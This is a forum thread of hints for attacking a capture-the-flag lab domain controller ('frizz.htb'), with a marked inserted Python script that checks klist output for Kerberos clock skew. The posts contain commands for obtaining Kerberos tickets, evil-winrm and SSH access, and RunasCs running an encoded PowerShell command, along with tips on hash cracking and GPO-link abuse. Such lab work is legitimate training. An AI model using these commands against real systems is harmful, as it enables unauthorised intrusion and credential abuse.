Posts: 49
Threads: 0
Joined: Dec 2024
Mar 15, 2025, 11:25 PM
(This post was last modified: Mar 15, 2025, 11:27 PM by 0xbeef.)
(Mar 15, 2025, 11:20 PM)potato_moose Wrote: Any help with the right command chain to make evil-winrm work?
Make sure you changed `/etc/krb5.conf` and also exported the ticket:
evil-winrm -i frizzdc.frizz.htb -r frizz.htb
P.S.: On the public instance this is lacking...
But once you have the ticket you can also access SSH, since it's open, using the same ticket.
(Mar 15, 2025, 11:02 PM)Phoka Wrote: (Mar 15, 2025, 10:55 PM)wh1t3_r4bb1t Wrote: Interesting. I used:
RunasCs.exe f.frizzle <password> --remote-impersonation -l 8 "powershell -e JABj..."
and it gives me:
whoami
frizz\w.webservice
I also tried these, man.
(Mar 15, 2025, 10:58 PM)Pyhoma Wrote: Guys, use the user and cracked password with impacket-getTGT to get a ticket, then use ssh f.frizzle@10.10.11.60
Bro, I got the f.frizzle.ccache but still getting errors.
Real errors.
Did you change the time? The clock was badly skewed.
Posts: 22
Threads: 0
Joined: Jan 2025
Anything for root?
Posts: 33
Threads: 1
Joined: Oct 2024
(Mar 15, 2025, 11:25 PM)0xbeef Wrote: (Mar 15, 2025, 11:20 PM)potato_moose Wrote: Any help with the right command chain to make evil-winrm work?
Make sure you changed `/etc/krb5.conf` and also exported the ticket:
evil-winrm -i frizzdc.frizz.htb -r frizz.htb
P.S.: On the public instance this is lacking...
But once you have the ticket you can also access SSH, since it's open, using the same ticket.
(Mar 15, 2025, 11:02 PM)Phoka Wrote: (Mar 15, 2025, 10:55 PM)wh1t3_r4bb1t Wrote: Interesting. I used:
RunasCs.exe f.frizzle <password> --remote-impersonation -l 8 "powershell -e JABj..."
and it gives me:
whoami
frizz\w.webservice
I also tried these, man.
(Mar 15, 2025, 10:58 PM)Pyhoma Wrote: Guys, use the user and cracked password with impacket-getTGT to get a ticket, then use ssh f.frizzle@10.10.11.60
Bro, I got the f.frizzle.ccache but still getting errors.
Real errors.
Did you change the time? The clock was badly skewed.
I get `f.frizzle@$IP: Permission denied (gssapi-with-mic,keyboard-interactive).` for ssh, and evil-winrm doesn't even connect:
Ticket cache: FILE:f.frizzle.ccache
Default principal: f.frizzle@FRIZZ.HTB
Valid starting Expires Service principal
03/16/2025 02:31:43 03/16/2025 12:31:43 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 03/17/2025 02:31:43
03/16/2025 02:31:57 03/16/2025 12:31:43 HTTP/frizzdc.frizz.htb@FRIZZ.HTB
renew until 03/17/2025 02:31:43
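Added example (not written by anyone in this thread): a small Python script that parses klist-style output like the listing above and checks each ticket against a given local clock value, which is the quickest way to confirm the clock-skew problem raised earlier in the thread before touching `/etc/krb5.conf`. The klist text is a constructed sample modelled on the listing above, and the 5-minute tolerance is the MIT Kerberos default clockskew.

```python
"""Check a klist ticket listing against the local clock (added example, not from the thread)."""
import re
from datetime import datetime, timedelta

# Constructed sample, modelled on the klist output quoted in the thread.
KLIST_OUTPUT = """\
Ticket cache: FILE:f.frizzle.ccache
Default principal: f.frizzle@FRIZZ.HTB

Valid starting       Expires              Service principal
03/16/2025 02:31:43  03/16/2025 12:31:43  krbtgt/FRIZZ.HTB@FRIZZ.HTB
\trenew until 03/17/2025 02:31:43
03/16/2025 02:31:57  03/16/2025 12:31:43  HTTP/frizzdc.frizz.htb@FRIZZ.HTB
\trenew until 03/17/2025 02:31:43
"""

FMT = "%m/%d/%Y %H:%M:%S"                     # klist's default timestamp format
TS = r"\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}"
TICKET_RE = re.compile(rf"^({TS})\s+({TS})\s+(\S+)$")
MAX_SKEW = timedelta(minutes=5)               # MIT krb5 default clockskew tolerance

def parse_klist(text):
    """Return (principal, [(valid_from, expires, service), ...]) from klist output."""
    principal, tickets = None, []
    for raw in text.splitlines():
        line = raw.strip()                     # 'renew until' lines are tab-indented
        if line.startswith("Default principal:"):
            principal = line.split(":", 1)[1].strip()
            continue
        m = TICKET_RE.match(line)              # header and 'renew until' lines do not match
        if m:
            tickets.append((datetime.strptime(m.group(1), FMT),
                            datetime.strptime(m.group(2), FMT), m.group(3)))
    return principal, tickets

def check_tickets(text, local_now):
    """Map each service principal to a verdict for the local clock value `local_now`
    (a klist-format string). Ticket times are stamped by the KDC, so a start time in
    the local future means the client clock is behind the DC by at least that much."""
    now = datetime.strptime(local_now, FMT)
    verdicts = {}
    for valid_from, expires, service in parse_klist(text)[1]:
        if now < valid_from - MAX_SKEW:
            verdicts[service] = "not yet valid (local clock behind the KDC)"
        elif now > expires + MAX_SKEW:
            verdicts[service] = "expired (stale ticket or local clock ahead)"
        else:
            verdicts[service] = "ok"
    return verdicts
```

A clock that the KDC and service consider more than the tolerated skew off is rejected at the authenticator stage, which is the `gssapi-with-mic` failure quoted above even though the cache itself looks fine.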
Posts: 17
Threads: 0
Joined: Jan 2025
(Mar 15, 2025, 11:20 PM)arrogantoverlord Wrote: Where did you guys find the hash to crack? If it's not too dumb of a question.
From roasting, I'm guessing, but my instance doesn't seem too fond of that...
Posts: 24
Threads: 2
Joined: Jun 2024
(Mar 15, 2025, 11:36 PM)arrogantoverlord Wrote: (Mar 15, 2025, 11:20 PM)arrogantoverlord Wrote: Where did you guys find the hash to crack? If it's not too dumb of a question.
From roasting, I'm guessing, but my instance doesn't seem too fond of that...
From the mysql database.
Posts: 17
Threads: 0
Joined: Jan 2025
(Mar 15, 2025, 11:41 PM)wh1t3_r4bb1t Wrote: (Mar 15, 2025, 11:36 PM)arrogantoverlord Wrote: (Mar 15, 2025, 11:20 PM)arrogantoverlord Wrote: Where did you guys find the hash to crack? If it's not too dumb of a question.
From roasting, I'm guessing, but my instance doesn't seem too fond of that...
From the mysql database.
Gotcha, I'm guessing it's where the not-dummy admin hash is supposed to be... I'll look around, thanks.
Posts: 49
Threads: 0
Joined: Dec 2024
(Mar 15, 2025, 11:34 PM)kyakeiuwu Wrote: (Mar 15, 2025, 11:25 PM)0xbeef Wrote: (Mar 15, 2025, 11:20 PM)potato_moose Wrote: Any help with the right command chain to make evil-winrm work?
Make sure you changed `/etc/krb5.conf` and also exported the ticket:
evil-winrm -i frizzdc.frizz.htb -r frizz.htb
P.S.: On the public instance this is lacking...
But once you have the ticket you can also access SSH, since it's open, using the same ticket.
(Mar 15, 2025, 11:02 PM)Phoka Wrote: (Mar 15, 2025, 10:55 PM)wh1t3_r4bb1t Wrote: Interesting. I used:
RunasCs.exe f.frizzle <password> --remote-impersonation -l 8 "powershell -e JABj..."
and it gives me:
whoami
frizz\w.webservice
I also tried these, man.
(Mar 15, 2025, 10:58 PM)Pyhoma Wrote: Guys, use the user and cracked password with impacket-getTGT to get a ticket, then use ssh f.frizzle@10.10.11.60
Bro, I got the f.frizzle.ccache but still getting errors.
Real errors.
Did you change the time? The clock was badly skewed.
I get `f.frizzle@$IP: Permission denied (gssapi-with-mic,keyboard-interactive).` for ssh, and evil-winrm doesn't even connect:
Ticket cache: FILE:f.frizzle.ccache
Default principal: f.frizzle@FRIZZ.HTB
Valid starting Expires Service principal
03/16/2025 02:31:43 03/16/2025 12:31:43 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 03/17/2025 02:31:43
03/16/2025 02:31:57 03/16/2025 12:31:43 HTTP/frizzdc.frizz.htb@FRIZZ.HTB
renew until 03/17/2025 02:31:43
Try them on a private instance using the Release Arena VPN; the regular ones seem problematic. Also make sure you updated your `/etc/krb5.conf` file.
Posts: 5
Threads: 0
Joined: Apr 2024
Mar 15, 2025, 11:59 PM
(This post was last modified: Mar 16, 2025, 12:03 AM by AbsolutelyMadProc.)
There's a 7z file in the Recycle Bin that contains the password for M.Schoolbus. The user has WriteGPLink perms over Class_FRIZZ and DOMAIN CONTROLLERS. Haven't looked into exploitation yet.
Posts: 49
Threads: 0
Joined: Dec 2024
(Mar 15, 2025, 11:59 PM)AbsolutelyMadProc Wrote: There's a 7z file in the Recycle Bin that contains the password for M.Schoolbus. The user has WriteGPLink perms over Class_FRIZZ, which contains v.fizzle. Haven't looked into exploitation yet.
I can't access that directory for some reason, can you share the pass?
Posts: 42
Threads: 1
Joined: Oct 2024
(Mar 15, 2025, 11:55 PM)0xbeef Wrote: (Mar 15, 2025, 11:34 PM)kyakeiuwu Wrote: (Mar 15, 2025, 11:25 PM)0xbeef Wrote: (Mar 15, 2025, 11:20 PM)potato_moose Wrote: Any help with the right command chain to make evil-winrm work?
Make sure you changed `/etc/krb5.conf` and also exported the ticket:
evil-winrm -i frizzdc.frizz.htb -r frizz.htb
P.S.: On the public instance this is lacking...
But once you have the ticket you can also access SSH, since it's open, using the same ticket.
(Mar 15, 2025, 11:02 PM)Phoka Wrote: (Mar 15, 2025, 10:55 PM)wh1t3_r4bb1t Wrote: Interesting. I used:
RunasCs.exe f.frizzle <password> --remote-impersonation -l 8 "powershell -e JABj..."
and it gives me:
whoami
frizz\w.webservice
I also tried these, man.
(Mar 15, 2025, 10:58 PM)Pyhoma Wrote: Guys, use the user and cracked password with impacket-getTGT to get a ticket, then use ssh f.frizzle@10.10.11.60
Bro, I got the f.frizzle.ccache but still getting errors.
Real errors.
Did you change the time? The clock was badly skewed.
I get `f.frizzle@$IP: Permission denied (gssapi-with-mic,keyboard-interactive).` for ssh, and evil-winrm doesn't even connect:
Ticket cache: FILE:f.frizzle.ccache
Default principal: f.frizzle@FRIZZ.HTB
Valid starting Expires Service principal
03/16/2025 02:31:43 03/16/2025 12:31:43 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 03/17/2025 02:31:43
03/16/2025 02:31:57 03/16/2025 12:31:43 HTTP/frizzdc.frizz.htb@FRIZZ.HTB
renew until 03/17/2025 02:31:43
Try them on a private instance using the Release Arena VPN; the regular ones seem problematic. Also make sure you updated your `/etc/krb5.conf` file.
Yeah, that worked for me!
Awkward public machines....